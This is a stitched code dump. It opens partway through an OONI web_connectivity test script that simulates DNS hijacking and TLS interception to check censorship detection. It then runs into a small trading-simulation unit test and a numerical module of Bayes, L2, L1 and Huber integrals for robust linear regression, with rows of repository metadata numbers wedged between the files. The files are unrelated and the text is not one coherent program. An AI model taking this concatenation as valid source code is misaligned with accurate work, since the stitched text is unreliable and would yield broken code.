tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.com/ web_connectivity",
"webconnectivity_dns_blocking_nxdomain",
args,
)
# The following seems a bug in MK where we don't properly record the
# actual error that occurred when performing the DNS experiment.
#
# See <https://github.com/measurement-kit/measurement-kit/issues/1931>.
if "miniooni" in ooni_exe:
assert tk["dns_experiment_failure"] == "dns_nxdomain_error"
else:
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "inconsistent"
assert tk["control_failure"] == None
if "miniooni" in ooni_exe:
assert tk["http_experiment_failure"] == None
else:
assert tk["http_experiment_failure"] == "dns_lookup_error"
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "dns"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 2080)
def webconnectivity_https_unknown_authority_with_inconsistent_dns(ooni_exe, outfile):
""" Test case where the DNS is sending us towards a website where
we're served an invalid certificate """
args = [
"-iptables-hijack-dns-to",
"127.0.0.1:53",
"-dns-proxy-hijack",
"example.org",
"-bad-proxy-address-tls",
"127.0.0.1:443",
"-tls-proxy-address",
"127.0.0.1:4114",
]
tk = execute_jafar_and_return_validated_test_keys(
ooni_exe,
outfile,
"-i https://example.org/ web_connectivity",
"webconnectivity_https_unknown_authority_with_inconsistent_dns",
args,
)
assert tk["dns_experiment_failure"] == None
assert tk["dns_consistency"] == "inconsistent"
assert tk["control_failure"] == None
if "miniooni" in ooni_exe:
assert tk["http_experiment_failure"] == "ssl_unknown_authority"
else:
assert "certificate verify failed" in tk["http_experiment_failure"]
assert tk["body_length_match"] == None
assert tk["body_proportion"] == 0
assert tk["status_code_match"] == None
assert tk["headers_match"] == None
assert tk["title_match"] == None
assert tk["blocking"] == "dns"
assert tk["accessible"] == False
assert_status_flags_are(ooni_exe, tk, 9248)
def main():
if len(sys.argv) != 2:
sys.exit("usage: %s /path/to/ooniprobelegacy-like/binary" % sys.argv[0])
outfile = "webconnectivity.jsonl"
ooni_exe = sys.argv[1]
tests = [
webconnectivity_https_ok_with_control_failure,
webconnectivity_http_ok_with_control_failure,
webconnectivity_transparent_http_proxy,
webconnectivity_dns_hijacking,
webconnectivity_control_unreachable_and_using_http,
webconnectivity_nonexistent_domain,
webconnectivity_tcpip_blocking_with_consistent_dns,
webconnectivity_tcpip_blocking_with_inconsistent_dns,
webconnectivity_http_connection_refused_with_consistent_dns,
webconnectivity_http_connection_reset_with_consistent_dns,
webconnectivity_http_nxdomain_with_consistent_dns,
webconnectivity_http_eof_error_with_consistent_dns,
webconnectivity_http_generic_timeout_error_with_consistent_dns,
webconnectivity_http_connection_reset_with_inconsistent_dns,
webconnectivity_http_successful_website,
webconnectivity_https_successful_website,
webconnectivity_http_diff_with_inconsistent_dns,
webconnectivity_http_diff_with_consistent_dns,
webconnectivity_https_expired_certificate,
webconnectivity_https_wrong_host,
webconnectivity_https_self_signed,
webconnectivity_https_untrusted_root,
webconnectivity_dns_blocking_nxdomain,
webconnectivity_https_unknown_authority_with_inconsistent_dns,
]
for test in tests:
test(ooni_exe, outfile)
time.sleep(7)
if __name__ == "__main__":
main()
| 37.516355 | 86 | 0.670019 | 4,073 | 32,114 | 5.025534 | 0.079548 | 0.109043 | 0.072695 | 0.055645 | 0.858615 | 0.854854 | 0.817138 | 0.785432 | 0.748302 | 0.744589 | 0 | 0.010169 | 0.219126 | 32,114 | 855 | 87 | 37.560234 | 0.806077 | 0.165753 | 0 | 0.723496 | 0 | 0 | 0.32185 | 0.115027 | 0 | 0 | 0 | 0.00117 | 0.442693 | 1 | 0.040115 | false | 0 | 0.014327 | 0 | 0.057307 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a3fbbcdc42a0b8bf7397fce283fbbab31d1182ac | 1,581 | py | Python | tests/TestUtils.py | DaveTCode/tradingsim | 4e7fe5389d9af9a0a34ca23b9e42e7e366a71966 | [
"MIT"
] | null | null | null | tests/TestUtils.py | DaveTCode/tradingsim | 4e7fe5389d9af9a0a34ca23b9e42e7e366a71966 | [
"MIT"
] | null | null | null | tests/TestUtils.py | DaveTCode/tradingsim | 4e7fe5389d9af9a0a34ca23b9e42e7e366a71966 | [
"MIT"
] | null | null | null | import unittest
import tradingsim.utils as utils
class TestUtils(unittest.TestCase):
def test_is_point_on_line_segment(self):
# Normal line
self.assertEqual(utils.is_point_on_line_segment(1, 1, 3, 3, 2, 2), True)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 3, 3, 2, 3), False)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 3, 3, 4, 4), False)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 3, 3, -1, -1), False)
# Backwards line
self.assertEqual(utils.is_point_on_line_segment(3, 3, 1, 1, 2, 2), True)
self.assertEqual(utils.is_point_on_line_segment(3, 3, 1, 1, 2, 3), False)
self.assertEqual(utils.is_point_on_line_segment(3, 3, 1, 1, 4, 4), False)
self.assertEqual(utils.is_point_on_line_segment(3, 3, 1, 1, 0, 0), False)
# Vertical line
self.assertEqual(utils.is_point_on_line_segment(1, 1, 1, 100, 1, 99), True)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 1, 100, 2, 99), False)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 1, 100, 1, 101), False)
self.assertEqual(utils.is_point_on_line_segment(1, 1, 1, 100, 1, -10), False)
# Vertical upside down line
self.assertEqual(utils.is_point_on_line_segment(1, 100, 1, 1, 1, 99), True)
self.assertEqual(utils.is_point_on_line_segment(1, 100, 1, 1, 2, 99), False)
self.assertEqual(utils.is_point_on_line_segment(1, 100, 1, 1, 1, 101), False)
self.assertEqual(utils.is_point_on_line_segment(1, 100, 1, 1, 1, -10), False)
| 51 | 85 | 0.674889 | 269 | 1,581 | 3.710037 | 0.122677 | 0.048096 | 0.153307 | 0.221443 | 0.847695 | 0.827655 | 0.827655 | 0.827655 | 0.827655 | 0.823647 | 0 | 0.095686 | 0.193548 | 1,581 | 30 | 86 | 52.7 | 0.687059 | 0.041746 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.8 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
432c98a8a67bf9ea698359093032e7a1825a02f8 | 34,867 | py | Python | src/numerical_functions.py | superporchetta/robust_linear_regression | d0b0022b442d7498ebecd1dcd44b5b2bea9a2459 | [
"MIT"
] | null | null | null | src/numerical_functions.py | superporchetta/robust_linear_regression | d0b0022b442d7498ebecd1dcd44b5b2bea9a2459 | [
"MIT"
] | null | null | null | src/numerical_functions.py | superporchetta/robust_linear_regression | d0b0022b442d7498ebecd1dcd44b5b2bea9a2459 | [
"MIT"
] | null | null | null | import numpy as np
from scipy.integrate import dblquad
from numba import njit, vectorize
from src.integration_utils import (
find_integration_borders_square,
divide_integration_borders_grid,
domains_double_line_constraint,
domains_double_line_constraint_only_inside,
)
MULT_INTEGRAL = 10
EPSABS = 1e-9
EPSREL = 1e-9
@njit(error_model="numpy", fastmath=True)
def ZoutBayes_single_noise(y, omega, V, delta):
return np.exp(-((y - omega) ** 2) / (2 * (V + delta))) / np.sqrt(
2 * np.pi * (V + delta)
)
@njit(error_model="numpy", fastmath=True)
def foutBayes_single_noise(y, omega, V, delta):
return (y - omega) / (V + delta)
@njit(error_model="numpy", fastmath=True)
def ZoutBayes_double_noise(y, omega, V, delta_small, delta_large, eps):
return (1 - eps) * np.exp(-((y - omega) ** 2) / (2 * (V + delta_small))) / np.sqrt(
2 * np.pi * (V + delta_small)
) + eps * np.exp(-((y - omega) ** 2) / (2 * (V + delta_large))) / np.sqrt(
2 * np.pi * (V + delta_large)
)
@njit(error_model="numpy", fastmath=True)
def foutBayes_double_noise(y, omega, V, delta_small, delta_large, eps):
small_exponential = np.exp(-((y - omega) ** 2) / (2 * (V + delta_small)))
large_exponential = np.exp(-((y - omega) ** 2) / (2 * (V + delta_large)))
return (
(y - omega)
* (
(1 - eps) * small_exponential / np.power(V + delta_small, 3 / 2)
+ eps * large_exponential / np.power(V + delta_large, 3 / 2)
)
/ (
(1 - eps) * small_exponential / np.power(V + delta_small, 1 / 2)
+ eps * large_exponential / np.power(V + delta_large, 1 / 2)
)
)
@njit(error_model="numpy", fastmath=True)
def ZoutBayes_decorrelated_noise(y, omega, V, delta_small, delta_large, eps, beta):
return (1 - eps) * np.exp( -((y - omega) ** 2) / (2 * (V + delta_small)) ) / np.sqrt(
2 * np.pi * (V + delta_small)
) + eps * np.exp(-((y - beta * omega) ** 2) / (2 * (beta ** 2 * V + delta_large))) / np.sqrt(
2 * np.pi * (beta ** 2 * V + delta_large)
)
@njit(error_model="numpy", fastmath=True)
def foutBayes_decorrelated_noise(y, omega, V, delta_small, delta_large, eps, beta):
small_exponential = np.exp(-((y - omega) ** 2) / (2 * (V + delta_small)))
large_exponential = np.exp(-((y - beta * omega) ** 2) / (2 * (beta**2 * V + delta_large)))
return (
(
(y - omega) * (1 - eps) * small_exponential / np.power(V + delta_small, 3 / 2)
+ eps * beta * (y - beta * omega) * large_exponential / np.power(beta ** 2 * V + delta_large, 3 / 2)
)
/ (
(1 - eps) * small_exponential / np.power(V + delta_small, 1 / 2)
+ eps * large_exponential / np.power(beta ** 2 * V + delta_large, 1 / 2)
)
)
# -------
@njit(error_model="numpy", fastmath=True)
def foutL2(y, omega, V):
return (y - omega) / (1 + V)
@njit(error_model="numpy", fastmath=True)
def DfoutL2(y, omega, V):
return -1.0 / (1 + V)
@njit(error_model="numpy", fastmath=True)
def foutL1(y, omega, V):
return (y - omega + np.sign(omega - y) * np.maximum(np.abs(omega - y) - V, 0.0)) / V
@njit(error_model="numpy", fastmath=True)
def DfoutL1(y, omega, V):
if np.abs(omega - y) > V:
return 0.0
else:
return -1.0 / V
@vectorize
def foutHuber(y, omega, V, a):
if a + a * V + omega < y:
return a
elif np.abs(y - omega) <= a + a * V:
return (y - omega) / (1 + V)
elif omega > a + a * V + y:
return -a
else:
return 0.0
@vectorize
def DfoutHuber(y, omega, V, a):
if (y < omega and a + a * V + y < omega) or (a + a * V + omega < y):
return 0.0
else:
return -1.0 / (1 + V)
# --------------
# Functions to integrate - Single Noise
# --------------
@njit(error_model="numpy", fastmath=True)
def q_integral_BO_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(q) * xi, 1 - q, delta)
* (foutBayes_single_noise(y, np.sqrt(q) * xi, 1 - q, delta) ** 2)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_L2_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutL2(y, np.sqrt(q) * xi, sigma)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_L2_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* (foutL2(y, np.sqrt(q) * xi, sigma) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_L2_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* DfoutL2(y, np.sqrt(q) * xi, sigma)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_L1_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutL1(y, np.sqrt(q) * xi, sigma)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_L1_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* (foutL1(y, np.sqrt(q) * xi, sigma) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_L1_single_noise(y, xi, q, m, sigma, delta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* DfoutL1(y, np.sqrt(q) * xi, sigma)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* foutHuber(y, np.sqrt(q) * xi, sigma, a)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* (foutHuber(y, np.sqrt(q) * xi, sigma, a) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_single_noise(y, np.sqrt(eta) * xi, (1 - eta), delta)
* DfoutHuber(y, np.sqrt(q) * xi, sigma, a)
)
# --------------
# Functions to integrate - Double Noise
# --------------
@njit(error_model="numpy", fastmath=True)
def q_integral_BO_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps):
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(q) * xi, (1 - q), delta_small, delta_large, eps
)
* (
foutBayes_double_noise(
y, np.sqrt(q) * xi, (1 - q), delta_small, delta_large, eps
)
** 2
)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_L2_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* foutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* foutL2(y, np.sqrt(q) * xi, sigma)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_L2_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* (foutL2(y, np.sqrt(q) * xi, sigma) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_L2_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* DfoutL2(y, np.sqrt(q) * xi, sigma)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_Huber_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* foutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* foutHuber(y, np.sqrt(q) * xi, sigma, a)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_Huber_double_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* (foutHuber(y, np.sqrt(q) * xi, sigma, a) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_Huber_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, a
):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_double_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps
)
* DfoutHuber(y, np.sqrt(q) * xi, sigma, a)
)
# --------------
# Functions to integrate - Decorrelated Noise
# --------------
@njit(error_model="numpy", fastmath=True)
def q_integral_BO_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta):
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(q) * xi, (1 - q), delta_small, delta_large, eps, beta
)
* (
foutBayes_decorrelated_noise(
y, np.sqrt(q) * xi, (1 - q), delta_small, delta_large, eps, beta
)
** 2
)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_L2_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* foutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* foutL2(y, np.sqrt(q) * xi, sigma)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_L2_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* (foutL2(y, np.sqrt(q) * xi, sigma) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_L2_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* DfoutL2(y, np.sqrt(q) * xi, sigma)
)
# ----
@njit(error_model="numpy", fastmath=True)
def m_integral_Huber_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* foutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* foutHuber(y, np.sqrt(q) * xi, sigma, a)
)
@njit(error_model="numpy", fastmath=True)
def q_integral_Huber_decorrelated_noise(y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* (foutHuber(y, np.sqrt(q) * xi, sigma, a) ** 2)
)
@njit(error_model="numpy", fastmath=True)
def sigma_integral_Huber_decorrelated_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps, beta, a
):
eta = m ** 2 / q
return (
np.exp(-(xi ** 2) / 2)
/ np.sqrt(2 * np.pi)
* ZoutBayes_decorrelated_noise(
y, np.sqrt(eta) * xi, (1 - eta), delta_small, delta_large, eps, beta
)
* DfoutHuber(y, np.sqrt(q) * xi, sigma, a)
)
# -----------
def border_plus_L1(xi, m, q, sigma):
return np.sqrt(q) * xi + sigma
def border_minus_L1(xi, m, q, sigma):
return np.sqrt(q) * xi - sigma
def test_fun_upper_L1(y, m, q, sigma):
return (y - sigma) / np.sqrt(q)
def test_fun_down_L1(y, m, q, sigma):
return (y + sigma) / np.sqrt(q)
def border_plus_Huber(xi, m, q, sigma, a):
return np.sqrt(q) * xi + a * (sigma + 1)
def border_minus_Huber(xi, m, q, sigma, a):
return np.sqrt(q) * xi - a * (sigma + 1)
def test_fun_upper_Huber(y, m, q, sigma, a):
return 1 / np.sqrt(q) * (-a * (sigma + 1) + y)
def test_fun_down_Huber(y, m, q, sigma, a):
return 1 / np.sqrt(q) * (a * (sigma + 1) + y)
# ------------------
# BayesOpt equations single noise
# ------------------
def q_hat_equation_BO_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_BO_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
return dblquad(
q_integral_BO_single_noise,
borders[0][0],
borders[0][1],
borders[1][0],
borders[1][1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
# ------------------
# L2 equations single noise
# ------------------
def m_hat_equation_L2_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: m_integral_L2_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
return dblquad(
m_integral_L2_single_noise,
borders[0][0],
borders[0][1],
borders[1][0],
borders[1][1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
def q_hat_equation_L2_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_L2_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
return dblquad(
q_integral_L2_single_noise,
borders[0][0],
borders[0][1],
borders[1][0],
borders[1][1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
def sigma_hat_equation_L2_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_L2_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
return dblquad(
sigma_integral_L2_single_noise,
borders[0][0],
borders[0][1],
borders[1][0],
borders[1][1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
# ------------------
# L1 equations single noise
# ------------------
def m_hat_equation_L1_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: m_integral_L1_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_L1,
border_minus_L1,
test_fun_upper_L1,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_L1_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def q_hat_equation_L1_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_L1_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_L1,
border_minus_L1,
test_fun_upper_L1,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_L1_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def sigma_hat_equation_L1_single_noise(m, q, sigma, delta):
borders = find_integration_borders_square(
lambda y, xi: q_integral_L1_single_noise(y, xi, q, m, sigma, delta),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_L1,
border_minus_L1,
test_fun_upper_L1,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_L1_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# Huber equations single noise
# ------------------
def m_hat_equation_Huber_single_noise(m, q, sigma, delta, a):
borders = find_integration_borders_square(
lambda y, xi: m_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_Huber_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def q_hat_equation_Huber_single_noise(m, q, sigma, delta, a):
borders = find_integration_borders_square(
lambda y, xi: q_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_Huber_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def sigma_hat_equation_Huber_single_noise(m, q, sigma, delta, a):
borders = find_integration_borders_square(
lambda y, xi: sigma_integral_Huber_single_noise(y, xi, q, m, sigma, delta, a),
np.sqrt((1 + delta)),
1.0,
)
args = {"m": m, "q": q, "sigma": sigma, "a": a}
domain_xi, domain_y = domains_double_line_constraint_only_inside(
borders,
border_plus_Huber,
border_minus_Huber,
test_fun_upper_Huber,
args,
args,
args,
)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
sigma_integral_Huber_single_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta, a),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# BayesOpt equations double noise
# ------------------
def q_hat_equation_BO_double_noise(m, q, sigma, delta_small, delta_large, eps):
borders = find_integration_borders_square(
lambda y, xi: q_integral_BO_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_BO_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
# ------------------
# L2 equations double noise
# ------------------
def m_hat_equation_L2_double_noise(m, q, sigma, delta_small, delta_large, eps):
borders = find_integration_borders_square(
lambda y, xi: m_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
m_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
def q_hat_equation_L2_double_noise(m, q, sigma, delta_small, delta_large, eps):
borders = find_integration_borders_square(
lambda y, xi: q_integral_L2_double_noise(
y, xi, q, m, sigma, delta_small, delta_large, eps
),
np.sqrt((1 + delta_small)),
1.0,
)
domain_xi, domain_y = divide_integration_borders_grid(borders)
integral_value = 0.0
for xi_funs, y_funs in zip(domain_xi, domain_y):
integral_value += dblquad(
q_integral_L2_double_noise,
xi_funs[0],
xi_funs[1],
y_funs[0],
y_funs[1],
args=(q, m, sigma, delta_small, delta_large, eps),
epsabs=EPSABS,
epsrel=EPSREL
)[0]
return integral_value
